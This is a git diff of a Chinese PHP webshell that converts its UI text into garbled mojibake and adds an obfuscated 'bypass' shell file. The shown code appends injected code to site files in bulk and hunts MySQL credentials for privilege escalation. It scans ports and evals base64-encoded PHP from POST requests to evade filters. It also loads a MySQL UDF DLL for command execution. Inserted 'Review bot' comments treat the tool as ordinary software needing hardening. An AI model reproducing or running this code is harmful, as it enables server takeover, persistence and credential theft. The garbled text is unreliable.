文件类型","60"); + html_n('
ļ"|",Ҳָļ.
'); + html_input("text","path",$patht,"·Χ","45"); + html_input("checkbox","pass","","ʹĿ¼","",true); + html_input("text","type",$typet,"

ļ","60"); html_text("code","67","5",$codet); html_n('

'); - html_radio("批量挂马","批量清马","guama","qingma"); - html_input("submit","passreturn","开始"); + html_radio("","","guama","qingma"); + html_input("submit","passreturn","ʼ"); html_n('
目标文件:

'); + html_n('
Ŀļ:

'); if(isset($_POST['pass'])) $bool = true; else $bool = false; do_passreturn($patht,$codet,$_POST['return'],$bool,$typet); } break; case "tihuan": - html_n('
此功能可批量替换文件内容,请小心使用.

'); - html_input("text","path",root_dir,"路径范围","45"); - html_input("checkbox","pass","","使用目录遍历","",true); + html_n('
˹ܿ滻ļ,Сʹ.

'); + html_input("text","path",root_dir,"·Χ","45"); + html_input("checkbox","pass","","ʹĿ¼","",true); html_text("newcode","67","5",$_POST['newcode']); - html_n('

替换为'); + html_n('

滻Ϊ'); html_text("oldcode","67","5",$_POST['oldcode']); - html_input("submit","passreturn","替换","

"); + html_input("submit","passreturn","滻","

"); html_n('
目标文件:

'); + html_n('
Ŀļ:

'); if(isset($_POST['pass'])) $bool = true; else $bool = false; do_passreturn($_POST['path'],$_POST['newcode'],"tihuan",$bool,$_POST['oldcode']); } @@ -979,31 +979,31 @@ function delTank() { case "scanfile": css_js("4"); - html_n('
此功能可很方便的搜索到保存MYSQL用户密码的配置文件,用于提权.
当服务器文件太多时,会影响执行速度,不建议使用目录遍历.

'); - html_input("text","path",root_dir,"路径名","45"); - html_input("checkbox","pass","","使用目录遍历","",true); - html_input("text","code",$_POST['code'],"

关键字","40"); - html_select(array("--MYSQL配置文件--","Discuz","PHPWind","phpcms","dedecms","PHPBB","wordpress","sa-blog","o-blog"),0,"onchange='return Fulll(options[selectedIndex].value)'"); + html_n('
˹ܿɺܷMYSQLûļ,Ȩ.
ļ̫ʱ,Ӱִٶ,ʹĿ¼.
'); + html_input("text","path",root_dir,"·","45"); + html_input("checkbox","pass","","ʹĿ¼","",true); + html_input("text","code",$_POST['code'],"

ؼ","40"); + html_select(array("--MYSQLļ--","Discuz","PHPWind","phpcms","dedecms","PHPBB","wordpress","sa-blog","o-blog"),0,"onchange='return Fulll(options[selectedIndex].value)'"); html_n('

'); - html_radio("搜索文件名","搜索包含文字","scanfile","scancode"); - html_input("submit","passreturn","搜索"); + html_radio("ļ","","scanfile","scancode"); + html_input("submit","passreturn",""); html_n('
找到文件:

'); + html_n('
ҵļ:

'); if(isset($_POST['pass'])) $bool = true; else $bool = false; do_passreturn($_POST['path'],$_POST['code'],$_POST['return'],$bool); } break; case "scanphp": - html_n('
原理是根据特征码定义的,请查看代码判断后再进行删除.

'); - html_input("text","path",root_dir,"查找范围","40"); - html_input("checkbox","pass","","使用目录遍历

脚本类型","",true); + html_n('
ԭǸ붨,鿴жϺٽɾ.
'); + html_input("text","path",root_dir,"ҷΧ","40"); + html_input("checkbox","pass","","ʹĿ¼

ű","",true); html_select(array("php" => "PHP","asp" => "ASP","aspx" => "ASPX","jsp" => "JSP")); - html_input("submit","passreturn","查找","

"); + html_input("submit","passreturn","","

"); html_n('
找到文件:

'); + html_n('
ҵļ:

'); if(isset($_POST['pass'])) $bool = true; else $bool = false; do_passreturn($_POST['path'],$_POST['class'],"scanphp",$bool); } @@ -1014,9 +1014,9 @@ function delTank() { $Port_port = isset($_POST['port']) ? $_POST['port'] : '21|23|25|80|110|135|139|445|1433|3306|3389|8080|43958|5631|2049|873|999'; print<< -
扫描IP
-
端口号
-
+
ɨIP
+
˿ں
+
END; if((!empty($_POST['ip'])) && (!empty($_POST['port']))) @@ -1026,7 +1026,7 @@ function delTank() { for($i = 0;$i < count($ports);$i++) { $fp = @fsockopen($_POST['ip'],$ports[$i],$errno,$errstr,2); - echo $fp ? '开放端口 ---> '.$ports[$i].'
' : '关闭端口 ---> '.$ports[$i].'
'; + echo $fp ? 'Ŷ˿ ---> '.$ports[$i].'
' : 'رն˿ ---> '.$ports[$i].'
'; ob_flush(); flush(); } @@ -1036,19 +1036,19 @@ function delTank() { case "getcode": -if (isset($_POST['url'])) {$proxycontents = @file_get_contents($_POST['url']);echo ($proxycontents) ? $proxycontents : "

获取 URL 内容失败

";exit;} +if (isset($_POST['url'])) {$proxycontents = @file_get_contents($_POST['url']);echo ($proxycontents) ? $proxycontents : "

ȡ URL ʧ

";exit;} print<<
在线代理ߴ

  • 用本功能仅实现简单的 HTTP 代理,不会显示使用相对路径的图片、链接及CSS样式表.
  • 用本功能可以通过本服务器浏览目标URL,但不支持 SQL Injection 探测以及某些特殊字符.
  • 用本功能浏览的 URL,在目标主机上留下的IP记录是 : {$_SERVER['SERVER_NAME']}

  • ñܽʵּ򵥵 HTTP ,ʾʹ·ͼƬӼCSSʽ.
  • ñܿͨĿURL,֧ SQL Injection ̽ԼijЩַ.
  • ñ URL,ĿµIP¼ : {$_SERVER['SERVER_NAME']}
URL: - +
不用写<? ?>标签,此功能优化使用BASE64加密传送,防止恶意代码被拦,用了就知道(小小细节,注定成就)



'; + }
д<? ?>ǩ,˹ŻʹBASE64ֹܴͣ뱻˾֪ССϸڣעɾͣ



'; if(!empty($_POST['phpcode'])){ echo "

"; eval(stripslashes(base64_decode($_POST['phpcode']))); @@ -1172,8 +1172,8 @@ function delTank() { break; case "myexp": - $MSG_BOX = '请先导出DLL,再执行命令.MYSQL用户必须为root权限,导出路径必须能加载DLL文件.'; - $info = '命令回显'; + $MSG_BOX = 'ȵDLL,ִ.MYSQLûΪrootȨ,·ܼDLLļ.'; + $info = ''; $mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $mpath = ''; $sqlcmd = 'ver'; if(isset($_POST['mhost']) && isset($_POST['muser'])) { @@ -1184,7 +1184,7 @@ function delTank() { @mysql_select_db($mdata); /*************************************/ $str=mysql_get_server_info(); - //echo 'MYSQL版本:'.$str." "; + //echo 'MYSQL汾:'.$str." "; if($str[2]>=1){ $sql="SHOW VARIABLES LIKE '%plugin_dir%'"; @@ -1218,14 +1218,14 @@ function delTank() { { $ap = explode('/', $mpath); $inpath = array_pop($ap); $query = 'Create Function sys_eval returns string soname \''.$inpath.'\';'; - $MSG_BOX = @mysql_query($query,$conn) ? '安装DLL成功' : '安装DLL失败'.mysql_error(); + $MSG_BOX = @mysql_query($query,$conn) ? 'װDLLɹ' : 'װDLLʧ'.mysql_error(); } - else $MSG_BOX = '导出DLL文件失败'.mysql_error(); + else $MSG_BOX = 'DLLļʧ'.mysql_error(); } - else $MSG_BOX = '写入临时表失败'; + else $MSG_BOX = 'дʱʧ'; @mysql_query('DROP TABLE Envl_Temp_Tab;',$conn); } - else $MSG_BOX = '创建临时表失败'; + else $MSG_BOX = 'ʱʧ'; } if(!empty($_POST['runcmd'])) { @@ -1236,28 +1236,28 @@ function delTank() { $k = 0; $info = NULL; while($row = @mysql_fetch_array($result)){$infotmp .= $row[$k];$k++;} $info = $infotmp; - $MSG_BOX = '执行成功'; + $MSG_BOX = 'ִгɹ'; } - else $MSG_BOX = '执行失败'; + else $MSG_BOX = 'ִʧ'; } } - else $MSG_BOX = '连接MYSQL失败'; + else $MSG_BOX = 'MYSQLʧ'; } print<<
{$MSG_BOX}
-地址 -端口 -用户 -密码 -库名 +˿ + +
-加载路径(自动获取) -64位MYSQL -
-
支持高版本MYSQL
- +·(Զȡ) +64λMYSQL +
+
ָ֧߰汾MYSQL
+
 
@@ -1278,16 +1278,16 @@ function delTank() {
 	  	setcookie('m_eanverport',$_POST['mport'],$cookietime);
 	  	setcookie('m_eanveruser',$_POST['muser'],$cookietime);
 	  	setcookie('m_eanverpass',$_POST['mpass'],$cookietime);
-	  	die('正在登录,请稍候...');
+	  	die('ڵ¼,Ժ...');
 	  }
   }
 print<<
-
地址
-
端口
-
用户
-
密码
-
+
ַ
+
˿
+
û
+
+
END; break; @@ -1300,7 +1300,7 @@ function delTank() { END; $BOOL = false; - $MSG_BOX = '用户:'.$_COOKIE['m_eanveruser'].'      地址:'.$_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'].'      版本:'; + $MSG_BOX = 'û:'.$_COOKIE['m_eanveruser'].'      ַ:'.$_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'].'      汾:'; $k = 0; $result = @mysql_query('select version();',$conn); while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;} - echo '
数据库:'; + echo '
ݿ:'; $result = mysql_query("SHOW DATABASES",$conn); while($db = mysql_fetch_array($result)){echo '  ['.$db['Database'].']';} echo '
'; @@ -1333,7 +1333,7 @@ function SubmitUrl(){ { mysql_select_db($_GET['db'],$conn); $_POST['nsql']=base64_decode($_POST['nsql']); - if(!empty($_POST['nsql'])){$BOOL = true; $MSG_BOX = mysql_query($_POST['nsql'],$conn) ? '执行成功' : '执行失败 '.mysql_error();} + if(!empty($_POST['nsql'])){$BOOL = true; $MSG_BOX = mysql_query($_POST['nsql'],$conn) ? 'ִгɹ' : 'ִʧ '.mysql_error();} if(is_array($_POST['insql'])) { $query = 'INSERT INTO '.$_GET['table'].' ('; @@ -1343,7 +1343,7 @@ function SubmitUrl(){ $queryb .= '\''.addslashes($key).'\','; } $query = $query.substr($querya, 0, -1).') VALUES ('.substr($queryb, 0, -1).');'; - $MSG_BOX = mysql_query($query,$conn) ? '添加成功' : '添加失败 '.mysql_error(); + $MSG_BOX = mysql_query($query,$conn) ? 'ӳɹ' : 'ʧ '.mysql_error(); } if(is_array($_POST['upsql'])) { @@ -1353,7 +1353,7 @@ function SubmitUrl(){ $queryb .= $var.'=\''.addslashes($key).'\','; } $query = $query.substr($queryb, 0, -1).' '.base64_decode($_POST['wherevar']).';'; - $MSG_BOX = mysql_query($query,$conn) ? '修改成功' : '修改失败 '.mysql_error(); + $MSG_BOX = mysql_query($query,$conn) ? '޸ijɹ' : '޸ʧ '.mysql_error(); } if(isset($_GET['del'])) { 
@@ -1362,23 +1362,23 @@ function SubmitUrl(){ $query = 'DELETE FROM '.$_GET['table'].' WHERE '; foreach($good as $var => $key){$queryc .= $var.'=\''.addslashes($key).'\' AND ';} $where = $query.substr($queryc, 0, -4).';'; - $MSG_BOX = mysql_query($where,$conn) ? '删除成功' : '删除失败 '.mysql_error(); + $MSG_BOX = mysql_query($where,$conn) ? 'ɾɹ' : 'ɾʧ '.mysql_error(); } $action = '?eanver=mysql_msg&db='.$_GET['db']; - if(isset($_GET['drop'])){$query = 'Drop TABLE IF EXISTS '.$_GET['drop'].';';$MSG_BOX = mysql_query($query,$conn) ? '删除成功' : '删除失败 '.mysql_error();} + if(isset($_GET['drop'])){$query = 'Drop TABLE IF EXISTS '.$_GET['drop'].';';$MSG_BOX = mysql_query($query,$conn) ? 'ɾɹ' : 'ɾʧ '.mysql_error();} if(isset($_GET['table'])){$action .= '&table='.$_GET['table'];if(isset($_GET['edit'])) $action .= '&edit='.$_GET['edit'];} if(isset($_GET['insert'])) $action .= '&insert='.$_GET['insert']; echo '
'; echo ' '; - echo ''; - echo ' '; - echo ' '; - echo '
'; + echo ''; + echo ' '; + echo ' '; + echo '
'; echo '
'.$MSG_BOX.'
'.$_GET['db'].' ---> '; if(isset($_GET['table'])) { echo ''.$_GET['table'].' '; - echo '[插入]
'; + echo '[]
'; if(isset($_GET['edit'])) { if(isset($_GET['p'])) $atable = $_GET['table'].'&p='.$_GET['p']; else $atable = $_GET['table']; @@ -1414,7 +1414,7 @@ function SubmitUrl(){ if(!isset($_GET['p'])){$p = 0;$_GET['p'] = 1;} else $p = ((int)$_GET['p']-1)*20; echo ''; - echo ''; + echo ''; while($row = @mysql_fetch_assoc($result)) { array_push($fields,$row['Field']); @@ -1426,18 +1426,18 @@ function SubmitUrl(){ $v = $p; while($text = @mysql_fetch_assoc($result)) { - echo ''; + echo ''; foreach($fields as $row){echo '';} echo ''."\r\n";$v++; } echo '
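Review bot: In the `-1362` hunk the rewritten `$action` assembly (`'&table='.$_GET['table']`, `'&edit='.$_GET['edit']`, `'&insert='.$_GET['insert']`) and the `echo ''.$_GET['db'].' ---> '` / `$_GET['table']` lines place raw query-string values into both a URL and the page body with no `urlencode()` or `htmlspecialchars()`, so a name containing `&`, `#`, `'` or `<` breaks the links and is rendered as markup. Build the links with `$action .= '&table='.urlencode($_GET['table']);` and print with `htmlspecialchars($_GET['db'], ENT_QUOTES)`. The `Drop TABLE IF EXISTS '.$_GET['drop']` statement on the same hunk is also interpolated unquoted; wrapping the identifier in backticks with embedded backticks doubled is the minimum for it to survive reserved words or spaces. The enclosing function starts and ends outside the hunk.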
操作
修改 '; - echo ' 删除
޸ '; + echo ' ɾ '.nl2br(htmlspecialchars(Mysql_Len($text[$row],500))).'
'; $pagep=$page-1; $pagen=$page+1; - echo "共有 ".$row_num." 条记录 "; - if($pagep>0) $pagenav.=" 首页 上一页 "; else $pagenav.=" 上一页 "; - if($pagen<=$pages) $pagenav.=" 下一页 尾页"; else $pagenav.=" 下一页 "; - $pagenav.=" 第 [".$page."/".$pages."] 页 跳到页"; + echo " ".$row_num." ¼ "; + if($pagep>0) $pagenav.=" ҳ һҳ "; else $pagenav.=" һҳ "; + if($pagen<=$pages) $pagenav.=" һҳ βҳ"; else $pagenav.=" һҳ "; + $pagenav.=" [".$page."/".$pages."] ҳ ҳ"; echo $pagenav; echo '
'; } @@ -1468,17 +1468,17 @@ function SubmitUrl(){ } $query = 'SHOW TABLES FROM '.$_GET['db'].';'; echo ''; - echo ''; - echo ''; - echo ''; - echo ''; + echo ''; + echo ''; + echo ''; + echo ''; $result = @mysql_query($query,$conn); $k = 0; while($table = mysql_fetch_row($result)) { $charset=substr($statucoll[$k],0,strpos($statucoll[$k],'_')); echo ''; - echo ''; + echo ''; echo ''."\r\n"; $k++; } @@ -1486,7 +1486,7 @@ function SubmitUrl(){ } } } - else die('连接MYSQL失败,请重新登录.'); + else die('MYSQLʧ,µ¼.'); if(!$BOOL and addslashes($query)!='') echo ''; break; @@ -1555,7 +1555,7 @@ function hmlogin($xiao=1){ } function do_down($fd){ - if(!@file_exists($fd)) msg('下载文件不存在'); + if(!@file_exists($fd)) msg('ļ'); $fileinfo = pathinfo($fd); header('Content-type: application/x-'.$fileinfo['extension']); header('Content-Disposition: attachment; filename='.$fileinfo['basename']); @@ -1750,21 +1750,21 @@ function do_passreturn($dir,$code,$type,$bool,$filetype = '',$shell = my_shell){ switch($type){ case "guama": if(debug($files,$filetype)){ - do_write($files,"ab","\n".$code) ? html_n("成功--> $files
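Review bot: In the `-1555` hunk the rewritten `msg(...)` guard is the only validation in `do_down()`, and the two `header()` calls right after it send `filename=` unquoted and a `Content-type` derived from the raw extension; a basename with a space, `;` or `"` produces a header that browsers parse as a truncated or different name. Use `header('Content-Disposition: attachment; filename="'.str_replace(['"', "\r", "\n"], '', $fileinfo['basename']).'"');` and a fixed `Content-Type: application/octet-stream` rather than `application/x-`.`$fileinfo['extension']`, which is unset for files without an extension and would emit `application/x-`. `do_down()` continues past the end of the hunk.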
") : html_n("失败--> $files
"); + do_write($files,"ab","\n".$code) ? html_n("ɹ--> $files
") : html_n("ʧ--> $files
"); } break; case "qingma": $filecode = @file_get_contents($files); if(stristr($filecode,$code)){ $newcode = str_replace($code,'',$filecode); - do_write($files,"wb",$newcode) ? html_n("成功--> $files
") : html_n("失败--> $files
"); + do_write($files,"wb",$newcode) ? html_n("ɹ--> $files
") : html_n("ʧ--> $files
"); } break; case "tihuan": $filecode = @file_get_contents($files); if(stristr($filecode,$code)){ $newcode = str_replace($code,$filetype,$filecode); - do_write($files,"wb",$newcode) ? html_n("成功--> $files
") : html_n("失败--> $files
"); + do_write($files,"wb",$newcode) ? html_n("ɹ--> $files
") : html_n("ʧ--> $files
"); } break; case "scanfile": @@ -1786,8 +1786,8 @@ function do_passreturn($dir,$code,$type,$bool,$filetype = '',$shell = my_shell){ if($fileinfo['extension'] == $code){ $filecode = @file_get_contents($files); if(muma($filecode,$code)){ - html_a("?eanver=editr&p=".urlencode($files),"编辑"); - html_a("?eanver=del&p=".urlencode($files),"删除"); + html_a("?eanver=editr&p=".urlencode($files),"༭"); + html_a("?eanver=del&p=".urlencode($files),"ɾ"); echo $files.'
'; } } @@ -1945,7 +1945,7 @@ function createfile(){ function File_Act($array,$actall,$inver,$REAL_DIR) { - if(($count = count($array)) == 0) return '请选择文件'; + if(($count = count($array)) == 0) return 'ѡļ'; if($actall == 'e') { function listfiles($dir=".",$faisunZIP,$mydir){ @@ -1979,7 +1979,7 @@ function listfiles($dir=".",$faisunZIP,$mydir){ function num_bitunit($num){ $bitunit=array(' B',' KB',' MB',' GB'); for($key=0;$key=pow(2,10*$key)-1){ //1023B 会显示为 1KB + if($num>=pow(2,10*$key)-1){ //1023B ʾΪ 1KB $num_bitunit_str=(ceil($num/pow(2,10*$key)*100)/100)." $bitunit[$key]"; } } @@ -1995,12 +1995,12 @@ function num_bitunit($num){ $filenum += listfiles($file,$faisunZIP,$mydir); } $faisunZIP -> createfile(); - return "压缩完成,共添加 $filenum 个文件.
点击下载 $inver (".num_bitunit(filesize("$inver")).")"; + return "ѹ, $filenum ļ.
$inver (".num_bitunit(filesize("$inver")).")"; }else{ - return "$inver 不能写入,请检查路径或权限是否正确.
"; + return "$inver д,·ȨǷȷ.
"; } }else{ - return "没有选择的文件或目录.
"; + return "ûѡļĿ¼.
"; } @@ -2011,24 +2011,24 @@ function num_bitunit($num){ $array[$i] = urldecode($array[$i]); switch($actall) { - case "a" : $inver = urldecode($inver); if(!is_dir($inver)) return '路径错误'; $filename = array_pop(explode('/',$array[$i])); @copy($array[$i],File_Str($inver.'/'.$filename)); $msg = '复制到'.$inver.'目录'; break; - case "b" : if(!@unlink($array[$i])){@chmod($filename,0666);@unlink($array[$i]);} $msg = '删除'; break; - case "c" : if(!eregi("^[0-7]{4}$",$inver)) return '属性值错误'; $newmode = base_convert($inver,8,10); @chmod($array[$i],$newmode); $msg = '属性修改为'.$inver; break; - case "d" : @touch($array[$i],strtotime($inver)); $msg = '修改时间为'.$inver; break; + case "a" : $inver = urldecode($inver); if(!is_dir($inver)) return '·'; $filename = array_pop(explode('/',$array[$i])); @copy($array[$i],File_Str($inver.'/'.$filename)); $msg = 'Ƶ'.$inver.'Ŀ¼'; break; + case "b" : if(!@unlink($array[$i])){@chmod($filename,0666);@unlink($array[$i]);} $msg = 'ɾ'; break; + case "c" : if(!eregi("^[0-7]{4}$",$inver)) return 'ֵ'; $newmode = base_convert($inver,8,10); @chmod($array[$i],$newmode); $msg = '޸Ϊ'.$inver; break; + case "d" : @touch($array[$i],strtotime($inver)); $msg = '޸ʱΪ'.$inver; break; } $i++; } - return '所选文件'.$msg.'完毕'; + return 'ѡļ'.$msg.''; } function start_unzip($tmp_name,$new_name,$todir='zipfile'){ $zip = new ZipArchive() ; if ($zip->open($tmp_name) !== TRUE) { -echo '抱歉!压缩包无法打开或损坏'; +echo 'Ǹѹ޷򿪻'; } $zip->extractTo($todir); $zip->close(); -echo '解压完毕!   进入解压目录   返回'; +echo 'ѹϣ   ѹĿ¼   '; } function muma($filecode,$filetype){ @@ -2086,7 +2086,7 @@ function html_img($url){ } function back(){ - html_n(""); + html_n(""); } function html_radio($namei,$namet,$v1,$v2){ 
@@ -2256,33 +2256,33 @@ function html_main() { if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { - $hsafemode = "ON (开启)"; + $hsafemode = "ON ()"; } else { - $hsafemode = "OFF (关闭)"; + $hsafemode = "OFF (ر)"; } $Server_IP = gethostbyname($_SERVER["SERVER_NAME"]); $Server_OS = PHP_OS; $Server_Soft = $_SERVER["SERVER_SOFTWARE"]; $web_server = php_uname(); $title = $_SERVER["HTTP_HOST"] . "/Manager"; - html_n("" . $title . "
表名 操作 字符集 大小
ַ С
'.$table[0].' 插入 删除 ɾ '.$statucoll[$k].''.File_Size($statusize[$k]).'
安全模式:{$hsafemode}-----{$Server_IP}-----{$Server_OS}-----{$Server_Soft}-----{$web_server}
"); + html_n("" . $title . "
ȫģʽ:{$hsafemode}-----{$Server_IP}-----{$Server_OS}-----{$Server_Soft}-----{$web_server}
"); html_n("
"); } function islogin($shellname,$myurl){ print<<body,td{font-size: 12px;color:#00ff00;background-color:#000000;}input,select,textarea{font-size: 12px;background-color:#FFFFCC;border:1px solid #fff}.C{background-color:#000000;border:0px}.cmd{background-color:#000;color:#FFF}body{margin: 0px;margin-left:4px;}BODY {SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323; SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838; SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;SCROLLBAR-TRACK-COLOR: #383838;}a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}.am{color:#888;font-size:11px;} -

{$shellname}

输入密码:


请勿用于非法用途,后果作者概不负责!
+

{$shellname}




ڷǷ;߸Ų
END; } function html_sql(){ - html_input("text","sqlhost","localhost","
MYSQL地址","30"); - html_input("text","sqlport","3306","
MYSQL端口","30"); - html_input("text","sqluser","root","
MYSQL用户","30"); - html_input("password","sqlpass","","
MYSQL密码","30"); - html_input("text","sqldb","dbname","
MYSQL库名","30"); - html_input("submit","sqllogin","登录","
"); + html_input("text","sqlhost","localhost","
MYSQLַ","30"); + html_input("text","sqlport","3306","
MYSQL˿","30"); + html_input("text","sqluser","root","
MYSQLû","30"); + html_input("password","sqlpass","","
MYSQL","30"); + html_input("text","sqldb","dbname","
MYSQL","30"); + html_input("submit","sqllogin","¼","
"); html_n(''); } @@ -2418,7 +2418,7 @@ function rusuredel(msg,url){ } function Delok(msg,gourl) { - smsg = "确定要删除[" + unescape(msg) + "]吗?"; + smsg = "ȷҪɾ[" + unescape(msg) + "]?"; if(confirm(smsg)) { if(gourl == \'b\') @@ -2440,14 +2440,14 @@ function CheckAll(form) } function CheckDate(msg,gourl) { - smsg = "当前文件时间:[" + msg + "]"; + smsg = "ǰļʱ:[" + msg + "]"; re = prompt(smsg,msg); if(re) { var url = gourl + re; var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/; var r = re.match(reg); - if(r==null){alert(\'日期格式不正确!格式:yyyy-mm-dd hh:mm:ss\');return false;} + if(r==null){alert(\'ڸʽȷ!ʽ:yyyy-mm-dd hh:mm:ss\');return false;} else{document.getElementById(\'actall\').value = gourl; document.getElementById(\'inver\').value = re; document.getElementById(\'fileall\').submit();} } } @@ -2490,7 +2490,7 @@ function CheckDate(){ var r = re.match(reg); var t = document.getElementById(\'charset\').value; t = t.toLowerCase(); - if(r==null){alert(\'日期格式不正确!格式:yyyy-mm-dd hh:mm:ss\');return false;} + if(r==null){alert(\'ڸʽȷ!ʽ:yyyy-mm-dd hh:mm:ss\');return false;} else{document.getElementById(\'newfile\').value = base64encode(document.getElementById(\'newfile\').value); if(t=="utf-8"){document.getElementById(\'txt\').value = base64encode(utf16to8(document.getElementById(\'txt\').value));} '); @@ -2507,7 +2507,7 @@ function CheckDate(){ Str[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\db.mdb"; Str[2] = "Driver={Sql Server};Server=,1433;Database=DbName;Uid=sa;Pwd=****"; Str[3] = "Driver={MySql};Server=;Port=3306;Database=DbName;Uid=root;Pwd=****"; - Str[4] = "Provider=MSDAORA.1;Password=密码;User ID=帐号;Data Source=服务名;Persist Security Info=True;"; + Str[4] = "Provider=MSDAORA.1;Password=;User ID=ʺ;Data Source=;Persist Security Info=True;"; Str[6] = "SELECT * FROM [TableName] WHERE ID<100"; Str[7] = "INSERT INTO [TableName](USER,PASS) VALUES(\'eanver\',\'mypass\')"; Str[8] = "DELETE FROM [TableName] WHERE ID=100"; 
@@ -2835,7 +2835,7 @@ function ExtractFile($header,$to,$zip){ if((!is_dir($mydir) && @mkdir($mydir,0777)) || (($mydir==$to.$header['filename'] || ($mydir==$to && $this->total_folders==0)) && is_dir($mydir)) ){ @chmod($mydir,0777); $this->total_folders ++; - echo "目录: $mydir
"; + echo "Ŀ¼: $mydir
"; } } @@ -2898,7 +2898,7 @@ function ExtractFile($header,$to,$zip){ } $this->total_files ++; - echo "文件: $to$header[filename]
"; + echo "ļ: $to$header[filename]
"; return true; } } diff --git a/shell.php.bypass.php b/shell.php.bypass.php new file mode 100644 index 0000000..de9750b --- /dev/null +++ b/shell.php.bypass.php @@ -0,0 +1,10 @@ +PTHD('Jnt-}+'^"\x2b\x1d\x7\x48\xf\x5f",array(('a \ No newline at end of file